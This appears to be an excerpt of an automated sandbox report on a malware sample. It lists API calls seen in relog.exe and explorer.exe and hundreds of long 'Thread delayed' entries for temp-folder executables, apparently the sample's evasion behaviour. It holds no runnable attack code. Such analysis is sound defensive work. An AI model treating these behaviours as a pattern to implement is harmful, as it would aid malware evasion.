Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C4F64 SHGetFolderPathW,FindFirstFileW,FindNextFileW,	55_2_00007FF7C07C4F64

Source: C:\Windows\explorer.exe

Code function: 2_2_08CB21AC GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualQuery,VirtualAlloc,

2_2_08CB21AC

Source: C:\Windows\explorer.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598929
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597621
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596757
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 99445
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98954
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98418
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98090
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 97869
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593578
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593296
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 593125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 99718
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 99453
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 99093
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98906
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98718
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98515
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 98343
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 591156
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590968
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590778
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590593
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590375
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 590078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589656
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589479
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589328
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 589140
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588993
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588765
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588600
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588343
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588187
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 588015
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587853
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587560
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587265
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 587125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586961
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586635
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 586218
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585984
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585750
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585585
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585421
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 585031
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584812
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584515
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 584203
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583843
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583531
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583307
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 583112
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582562
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582281
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 582078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581921
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581687
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581423
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581258
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 581046
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580862
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580671
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580265
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 580077
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579875
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579709
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579492
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 579296
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578953
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578484
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 578078
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577734
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577484
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577341
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 577125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576937
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576703
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576468
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576318
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 576125
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575937
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575781
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 575627
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599359
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 598495
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 598168
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597947
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99125
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98967
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98786
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98609
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98421
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 595184
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594775
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 594615
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99359
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99171
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 99026
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98843
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 98640
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 599101
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 598026
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593922
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 592766
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 592438
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591610
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591313
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 591105
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590575
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 590328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589985
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589413
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 589194
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588911
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588672
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588489
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 588047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 587172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586953
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586557
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586359
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 586177
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585984
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585824
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 585172
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584946
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584782
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584531
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 584032
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583794
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583450
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 583188
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582969
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582324
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 582125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 581297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580961
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580750
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580578
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 580102
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579910
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579705
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579500
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579250
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 579028
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578499
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 578203
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577656
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577344
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 577094
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576563
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576282
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 576057
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575797
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575578
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575352
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 575078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574532
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574281
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 574047
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573700
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573250
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 573016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572375
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 572125
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571938
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571709
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571469
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571219
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 571016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570813
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570594
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 570297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569907
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569422
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569227
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 569016
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568779
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568618
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568406
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 568208
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567719
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567438
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567226
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 567031
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566857
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566690
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566496
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566305
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 566031
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565828
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565625
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 565183
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564891
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564514
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 564078
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563844
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563328
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 563123
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562906
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562688
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562391
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 562195
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561985
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561735
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561516
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561297
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Thread delayed: delay time: 561078
